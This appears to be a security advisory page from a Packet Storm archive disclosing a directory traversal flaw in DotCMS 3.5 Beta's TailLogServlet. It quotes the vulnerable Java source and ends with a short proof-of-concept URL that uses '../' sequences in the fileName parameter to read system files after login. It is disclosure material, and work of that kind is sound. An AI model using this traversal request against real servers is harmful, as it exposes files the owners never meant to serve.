exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

DotCMS 3.5 Beta Directory Traversal

DotCMS 3.5 Beta Directory Traversal
Posted Apr 9, 2016
Authored by Piaox Xiong

DotCMS version 3.5 Beta suffers from a directory traversal vulnerability.

tags | exploit, file inclusion
SHA-256 | 1fad220bd9b74144259838fdc1996fc91aa92055bf12ec9962731c4a8aa8c02d

DotCMS 3.5 Beta Directory Traversal

Change Mirror Download
Advisory: DotCMS Directory traversal vulnerability

Author: Piaox From Pingan Product Safety Group

Email: xiongyaofu351@pingan.com.cn

Affected Version: dotCMS 3.5 Beta(the latest version)



==========================

Vulnerability Description

Recetly, I found a Directory traversal vulnerability in ‘DotCMS'
program, DotCMS is widely used in many companies.



Vulnerable file is: “com.dotmarketing.servlets.taillog.TailLogServlet.class”

File file = *null*;

String tailLogLofFolder = *Config*.*getStringProperty*(
"TAIL_LOG_LOG_FOLDER", "./dotsecure/logs/");

*try*

{

*if* (!tailLogLofFolder.endsWith(File.separator)) {

tailLogLofFolder = tailLogLofFolder + File.separator;

}

file = *new* File(*FileUtil*.*getAbsolutlePath*(tailLogLofFolder +
fileName));

}

*catch* (Exception e)

{

*Logger*.*error*(getClass(), "unable to open log file '" +
tailLogLofFolder + fileName + "' please set the config variable
TAIL_LOG_LOG_FOLDER correctly");

}

*if* ((file == *null*) || (!file.exists()))

{

response.sendError(403);

*AdminLogger*.*log*(*TailLogServlet*.*class*, "service", "Someone
tried to use the TailLogServlet to display a file not in the logs directory"
);

*return*;

}

String regex = *Config*.*getStringProperty*("TAIL_LOG_FILE_REGEX");

//WEB-INF/classes/dotmarketing-config.properties:TAIL_LOG_FILE_REGEX=.*\.log$|.*\.out$

*if* (!*UtilMethods*.*isSet*(regex)) {

regex = "!.*";

}

*if* (!Pattern.compile(regex).matcher(fileName).matches()) {

//Only detects whether the file extension .log end,lead ,caused Directory
traversal vulnerability.

*return*;

}

response.setContentType("text/html;charset=UTF-8");



ServletOutputStream out = response.getOutputStream();



out.print("<html><head><title>dotCMS Log</title><style
type='text/css'>@import '/html/css/dot_admin.css';</style><script>var
working =false;function
doS(){if(!working){working=true;if(parent.document.getElementById('scrollMe').checked){dh=document.body.scrollHeight;ch=document.body.clientHeight;if(dh>ch){moveme=dh-ch;window.scrollTo(0,moveme);}}working=false;}}</script></head><body
class='tailerBody'>");



out.flush();



*Tailer* tailer = *null*;

*long* startPosition = file.length() - 5000L < 0L ? 0L : file.length()
- 5000L;



*MyTailerListener* listener = *new* MyTailerListener(*null*);

listener.*handle*("Tailing " + fileName);

listener.*handle*("----------------------------- ");

tailer = *new* *Tailer*(file, listener, 1000L);

tailer.*setStartPosition*(startPosition);

*MyTailerThread* thread = *new* *MyTailerThread*(tailer);



String name = *null*;

*for* (*int* i = 0; i < 1000; i++)

{

name = "LogTailer" + i + ":" + fileName;

Thread t = *ThreadUtils*.*getThread*(name);

*if* (t == *null*) {

*break*;

}

*if* (i > 100) {

*throw* *new* ServletException("Too many Logger threads");

}

}



==========================

POC && EXP

==========================

1. Login

2.
http://localhost:8080/dotTailLogServlet/?fileName=../../../../../../../../var/log/system.log


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close